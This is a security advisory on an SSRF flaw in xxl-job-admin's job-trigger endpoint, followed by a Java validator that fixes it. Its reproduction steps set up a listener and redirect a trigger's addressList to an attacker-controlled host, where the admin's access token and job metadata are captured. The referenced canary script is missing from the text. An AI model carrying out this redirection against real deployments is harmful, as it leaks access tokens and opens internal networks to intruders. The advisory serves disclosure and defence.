# XXL-JOB SSRF Vulnerability Summary (Issue #3935)

## Vulnerability Overview

A Server-Side Request Forgery (SSRF) vulnerability exists in the `/jobinfo/trigger` endpoint of `xxl-job-admin`.

* **Trigger Conditions**: A low-privilege user (with permission to a job group) can submit arbitrary `addressList` values when manually triggering a job.
* **Vulnerability Principle**: The service layer only verifies that the user belongs to the job group; it does not validate that the `addressList` belongs to that group or to a trusted executor. On trigger, the supplied `addressList` overrides the address configured for the group, and the admin server's HTTP client sends a `POST /run` request to the attacker-controlled URL.
* **Impact**: An attacker can use the admin server's network position to reach internal HTTP targets and capture the `XXL-JOB-ACCESS-TOKEN` together with the `TriggerRequest` object containing job metadata.

## Scope of Impact

* **Affected Versions**: xxl-job

## Reproduction

```bash
# 1. Start the canary listener on the xxl-job Docker network
root@qa2:~/src/xxl-job# cat > /tmp/ssrf_canary.py <<'PY'
# (Paste the Python code above here)
PY
root@qa2:~/src/xxl-job# docker run -d --name canary \
  --network docker-xxl-job-network \
  -p 18801:80 \
  -v /tmp/ssrf_canary.py:/app/server.py \
  python:3.10-slim \
  python /app/server.py

# 2. Intercept the /jobinfo/trigger request and modify the addressList parameter to the attacker-controlled address
#    (e.g., http://canary:18801)

# 3. Observe the canary logs to confirm receipt of the following:
#    - POST /run
#    - Header containing XXL-JOB-ACCESS-TOKEN
#    - Body containing TriggerRequest JSON (including jobId, executorParams, executorHandler, logId, etc.)
```
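The check that the service layer lacks, as an added example rather than xxl-job's own code: a user-supplied `addressList` is accepted only if every entry is already registered for the job group the user is authorised on, so the override can never redirect `POST /run` to a caller-chosen host. The class and method names, and the assumption that address lists are comma-separated URLs, are illustrative.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.*;

// Illustrative hardening, not xxl-job's own code: names, signatures and the
// comma-separated address format are assumptions for this example.
public final class TriggerAddressValidator {

    // Canonical "scheme://host:port" so that "http://exec-1:9999/" and
    // "HTTP://EXEC-1:9999" compare equal, and user@host forms compare on host.
    static String canonical(String raw) {
        URI u;
        try {
            u = new URI(raw.trim());
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed executor address");
        }
        String scheme = u.getScheme() == null ? "" : u.getScheme().toLowerCase(Locale.ROOT);
        if (u.getHost() == null || !(scheme.equals("http") || scheme.equals("https"))) {
            throw new IllegalArgumentException("executor address must be an http(s) URL");
        }
        int port = u.getPort() != -1 ? u.getPort() : (scheme.equals("https") ? 443 : 80);
        return scheme + "://" + u.getHost().toLowerCase(Locale.ROOT) + ":" + port;
    }

    // requested:      addressList from the trigger request (may be null or blank)
    // groupAddresses: executor addresses registered for the job group
    // Returns the addresses to dispatch to; throws if any requested address is
    // not registered for the group, so POST /run never goes to a caller-chosen host.
    public static List<String> resolveTargets(String requested, String groupAddresses) {
        Set<String> trusted = new LinkedHashSet<>();
        for (String a : groupAddresses.split(",")) {
            if (!a.isBlank()) trusted.add(canonical(a));
        }
        if (requested == null || requested.isBlank()) {
            return new ArrayList<>(trusted); // no override requested: use the group's list
        }
        List<String> targets = new ArrayList<>();
        for (String a : requested.split(",")) {
            if (a.isBlank()) continue;
            String c = canonical(a);
            if (!trusted.contains(c)) { // fail closed on the first unregistered entry
                throw new IllegalArgumentException("addressList entry is not registered for this job group");
            }
            targets.add(c);
        }
        return targets;
    }
}
```

Rejecting the whole trigger (rather than silently dropping unknown entries) also gives operators a clear audit signal: a `/jobinfo/trigger` call that fails this check is worth alerting on.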